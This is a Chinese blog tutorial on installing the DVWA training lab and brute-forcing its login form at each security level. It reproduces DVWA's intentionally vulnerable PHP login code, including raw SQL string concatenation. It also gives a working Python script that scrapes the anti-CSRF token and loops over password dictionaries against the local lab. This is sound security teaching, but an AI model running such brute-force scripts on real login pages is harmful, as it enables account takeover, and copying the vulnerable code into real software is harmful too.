web安全之DVWA初探及爆破(一)

之前的安全实战都是在某个漏洞测试网站或者题库上,然后正式的网站渗透都是虚拟机,很卡限制很多.显然不是长久之计. 那么就需要自己搭建一个本地的漏洞测试平台. 也就是今天的主题DVWA.它涵盖范围广泛,难度坡度均匀. 先简单介绍一下它的模块.

0x00. Why DVWA?

图中可见,大部分的web渗入的手段都有提高了.那么具体来说,dvwa的实战也是跟随它的目录章节.把之前经历过的渗透方式重新整体的走一遍. (验证码破解环节因为是google的接口.国内基本没人使用,暂时跳过)

dvwa分low,medium,high 三等级的利用. 以及impossible等级的修复.一般来说,寻找漏洞分为两个核心

• 怎么找漏洞(思路)
  • 手工挖 (重中之重,不要依赖工具)
  • 工具挖
  • 自己写工具/写payload挖
• 为什么这么找
• 找完如何补

补充: 还有一个DSVW系统,是python环境的漏洞测试环境. 可以增加测试的多样性. 建议之后也搭建起来. 这样才能熟悉更多的实际环境.

0x01. DVWA部署环境

大致分为以下三步. 其中第二步用phpStudy,自行官网下载安装即可,一键化,很好用.

1. 渗透工具集合

   hackbar+proxy swticher+tamper data(bs的简版)

2. PHP/Nginx+Apache环境搭建

3. DVWA代码的安装

DVWA是PHP编写的web渗透测试环境.包含常见流行安全漏洞.

1. 首先我们从github上下好最新的1.9版解压丢到phpStudy的www目录下,然后进入 config/config.inc.php 修改其中的db_password为root (因为phpStudy自带的是这个,不一样自行修改).
2. 直接可以访问DVWA了.localhost/dvwa/setup.php
3. 点击 create database 创建数据库,然后访问 login.php (同一目录)

这里需要注意的是,实测如果版本为php7的时候会提示报错. 原因不明,换回5.4版本就正常了..下方信息是点击之后正常提示的. 默认用户名 admin ,密码password 进入之后说明dvwa已经部署成功.

0x02. 暴力破解初探

部署完dvwa并研究完它基本结构参数,就开始动手实战了. 第一个就先看看暴破. 穷举法+社工字典是常用手段.

1.什么是爆破

最经典的例子,以前的行李箱上总有三位密码锁.理论上有1000次的爆破机会一定会打开密码.

//写个简单的伪码,密码从000~999有这些可能,动作抽象为函数
for(pwd=000;pwd<=999;pwd++){
  swipeLock();
  pressButton();
  if(package.status == close) continue;
  else break;
}

大家看完可能说这个方法好傻,我觉得很多人就是用一些简单的密码,比如 111,777,123,321之类的,应该先尝试这些常见密码,不行再去尝试其他. 这都是很好的想法,可以对程序进行一些优化. 也就是我们说的社工字典的起源之一.

2.爆破准备

除了之前准备好了的firefox+proxy switcher+ dvwa, 这里要用到一个新的工具 OWASP ZAP ,什么是ZAP呢? 它就是配合proxy swticher使用截取请求网络包内容的工具. (github上自己下一个win的最新版本.)安装好之后也是一个类似burpsuit或者Charles这种界面.

大致三个界面,还是很常见的.quick start里面可以快速对网页进行检查.这个比较类似简版AWVS.

然后设置之前dvwa页面下面的安全等级,默认是impossible(唔..),改成low.这样才能学习~.

3.手工爆破

进行任何爆破分析,秒杀分析之前,都要先分析过程. 不要急着乱试. 比如这里3步,键盘动作2次,鼠标动作1次.

随便尝试一下发现不行,那么我们需要用户名+密码的常见字典.排列组合后就比较多了.

手工就不多说了,除非社工小,基本不用多考虑.直接说自动化的思路.丢个源码,可以看到passwd还

<?php
if( isset( $_GET[ 'Login' ] ) ) {
    // Get username
    $user = $_GET[ 'username' ];
    // Get password
    $pass = $_GET[ 'password' ];
    $pass = md5( $pass );
    // Check the database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );
    if( $result && mysql_num_rows( $result ) == 1 ) {
        // Get users details
        $avatar = mysql_result( $result, 0, "avatar" );

        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }
    mysql_close();
}
?>

4.自动化爆破

基于密码字典与自动化脚本/工具. 本质就是模拟GET/POST请求去尝试.同时注意避开各种反爆破

那么回想之前的伪码.这里如何对比登录成功还是失败呢? 返回的状态码么? response信息么? 通过实测发现首先返回码是一样的,response信息而言又比较麻烦.

通过抓包发现二者响应页面的大小是不一样的. 一个是4.83kb,一个是4.88kb. 然后用Fuzz去设置两个参数的字典,随便写几个常见的.开始之后就开始一个个尝试了.

但是这里非常尴尬的是,我发现怎么用fuzz跑的时候,怎么跟之前抓包大小不一样了.而且为什么错误的也有两种大小…..简直醉的不行,调了半小时也没发现,之后再看看吧….

今天再看发现原因了,真的是天坑啊

原来fuzz里面设置添加payload不是选参数,是选参数的值. 比如 username=xxx ,是选中xxx…..简直坑惨了被…大家引起注意…因为很容易想成k-v对. 好啦,爆破成功.

5.Medium & Hard等级爆破

<?php
if( isset( $_GET[ 'Login' ] ) ) {
    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = mysql_real_escape_string( $user );
    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = mysql_real_escape_string( $pass );
    $pass = md5( $pass );

    // Check the database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

    if( $result && mysql_num_rows( $result ) == 1 ) {
        // Get users details
        $avatar = mysql_result( $result, 0, "avatar" );
        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( 2 );
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }
    mysql_close();
}
?> 

首先上源码. 同样这里也可以使用简单字典就能爆破,但是我们发现爆破时间长了很久. 查看源码发现最后的部分,如果登录失败会 sleep 2s ,简直啦,如果在这写成递增的,或者变化的. 也就很难去爆破了 这也是为我们反爆破提供了思路

那么hard等级呢? 上代码

<?php
if( isset( $_GET[ 'Login' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = stripslashes( $user );
    $user = mysql_real_escape_string( $user );
    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = mysql_real_escape_string( $pass );
    $pass = md5( $pass );
    // Check database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );
    if( $result && mysql_num_rows( $result ) == 1 ) {
        // Get users details
        $avatar = mysql_result( $result, 0, "avatar" );
        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( rand( 0, 3 ) );
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }
    mysql_close();
}
// Generate Anti-CSRF token
generateSessionToken();
?> 

可以看到明显不能直接爆破了.原因

• 引入了token,一个是request_token,一个是session_token,访问时自动生成.
• 对usrname& passwd 做了参数过滤,stripslashes()过滤 \ (反斜杠).
• mysql_real_escape_string() 函数转义字符串中的特殊字符. (‘,’’,,\r等)
• 登录失败时间随机化,可能等待很久,并且无法通过时间来判断是否登录成功了.
• 最后还生成了一个反CRSF的token~ 哈哈.

上手抓包,发现请求头朋友已经带了这个user_token参数了. 既然它这么正大光明的在请求中,那么自然想到可能是躲在的隐藏域.找一下果然有

GET http://localhost/dvwa/vulnerabilities/brute/?username=123&password=333&Login=Login
&user_token=bc0a1ad93834c7e894ed0c1a4beb0dfa
<!--form中找到了-->
<input name="user_token" value="bc0a1ad93834c7e894ed0c1a4beb0dfa" type="hidden">

那我们就会想,这个东西是怎么生成来的呢? 发现它来自上一次记录的response包中.且每次请求都不一样.

那么要重新设计破解思路了.先分析现有流程

这里我们会发现,第一次登陆首页之后就会自动生成,之后每次都在不断变化,显然是很难捕捉的.但是登陆首页是不需要token的. 那么我们可以针对这个作为突破口. 我们爆破的每次都重新登陆一次首页,这样就能获得它的token值了. 流程如下:

访问首页–>获取user_token–>发送数据包请求, 重复以上动作,直至尝试成功.

伪码如下:

String msg = "Username and/or password incorrect.";
for(usrname in usrnameDic){ //Dic是爆破字典数组
  for(passwd in passwdDic){
    visitHome();
    getUserToken();
    sendLoginPakage();
    if(msg instanceof HTML)continue; //fail
    else break; //success
  }
}

写出伪码之后就思路很清晰了,这里因为要跟前端页面交互一下了,用java/c++肯定重了,当然是来个python跑一下咯.来py代码,就用基本的py2+urllib2了. 用py3跟urllib当然也是可以的. 自己改一下就是.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib2
import re

#输入当前IP地址
IP = '127.0.0.1'
#输入自己当前的sessionid，抓包可查
PHPSESSID = 'e893d6112e7ae5744b2069235a66da77'

#设置cookie
opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', 'security=high; PHPSESSID=' + PHPSESSID))

#爆破字典
usernames = ['admin','manage','system','root','whoami']
passwords = ['admin','root','123456','password','abc123','111111','654321','000000']

#确认破解范围
for username in usernames:
    for password in passwords:
        #访问首页
        response = opener.open('http://' + IP + '/dvwa/vulnerabilities/brute/')
        content = response.read()
        #获取user_token
        user_token = re.findall(r"(?<=<input type='hidden' name='user_token' value=').+?(?=' />)",content)[0]
        #发送登录数据包
        url = 'http://'+IP+'/dvwa/vulnerabilities/brute/?username='+username+'&password='+password+'&Login=Login&user_token='+user_token
        response = opener.open(url)
        content = response.read()
        #确认破解结果
        print '-'*20
        print u'用户名：'+username
        print u'密码：'+password
        if 'Username and/or password incorrect.' in content:
            print u'Fail...'
        else:
            print u'Success~'
        print '-'*20

运行效果如下:

做完这个,有兴趣的话也可以自己修改一下爆破一下登录页面的py. 我后面也会补上.

先看最后的Impossible级别把. code first: (尼玛一下这么长了..)

<?php
if( isset( $_POST[ 'Login' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Sanitise username input
    $user = $_POST[ 'username' ];
    $user = stripslashes( $user );
    $user = mysql_real_escape_string( $user );

    // Sanitise password input
    $pass = $_POST[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = mysql_real_escape_string( $pass );
    $pass = md5( $pass );

    // Default values
    $total_failed_login = 3;
    $lockout_time       = 15;
    $account_locked     = false;
  
    // Check the database (Check user information)
    $data = $db->prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR );
    $data->execute();
    $row = $data->fetch();
  
    // Check to see if the user has been locked out.
    if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) )  {
        // User locked out.  Note, using this method would allow for user enumeration!
        //echo "<pre><br />This account has been locked due to too many incorrect logins.</pre>";
        // Calculate when the user would be allowed to login again
        $last_login = $row[ 'last_login' ];
        $last_login = strtotime( $last_login );
        $timeout    = strtotime( "{$last_login} +{$lockout_time} minutes" );
        $timenow    = strtotime( "now" );
        // Check to see if enough time has passed, if it hasn't locked the account
        if( $timenow > $timeout )
            $account_locked = true;
    }
    // Check the database (if username matches the password)
    $data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR);
    $data->bindParam( ':password', $pass, PDO::PARAM_STR );
    $data->execute();
    $row = $data->fetch();
    // If its a valid login...
    if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) {
        // Get users details
        $avatar       = $row[ 'avatar' ];
        $failed_login = $row[ 'failed_login' ];
        $last_login   = $row[ 'last_login' ];
        // Login successful
        echo "<p>Welcome to the password protected area <em>{$user}</em></p>";
        echo "<img src=\"{$avatar}\" />";
        // Had the account been locked out since last login?
        if( $failed_login >= $total_failed_login ) {
            echo "<p><em>Warning</em>: Someone might of been brute forcing your account.</p>";
            echo "<p>Number of login attempts: <em>{$failed_login}</em>.<br />Last login attempt was at: <em>${last_login}</em>.</p>";
        }
        // Reset bad login count
        $data = $db->prepare( 'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' );
        $data->bindParam( ':user', $user, PDO::PARAM_STR );
        $data->execute();
    }
    else {
        // Login failed
        sleep( rand( 2, 4 ) );
        // Give the user some feedback
        echo "<pre><br />Username and/or password incorrect.<br /><br/>Alternative, the account has been locked because of too many failed logins.<br />If this is the case, <em>please try again in {$lockout_time} minutes</em>.</pre>";
        // Update bad login count
        $data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' );
        $data->bindParam( ':user', $user, PDO::PARAM_STR );
        $data->execute();
    }
  
    // Set the last login time
    $data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR );
    $data->execute();
}
generateSessionToken();// Generate Anti-CSRF token
?> 

分析难度:

• total_failed_login, lockout_time,account_locked. 三个参数增加了之前我们说的爆破时长跟限制了次数.
• sql语句使用了prepareStatement 预处理了,基本没有办法sql注入咯.
• 后面整体就是查询错误次数,用户是否被锁的逻辑了.

唔….因为错误次数是直接存db中的,并不能刷新或者改ip就能绕过.这样的话….爆破手段就很难受了.难怪叫impossible level啊… 爆破就先到这咯

ps:后续想起来测试一下自家的website…同样是不忍直视,毫无防护.时间足够可以把所有账户密码可能都爆出来.安全意识是base问题啊….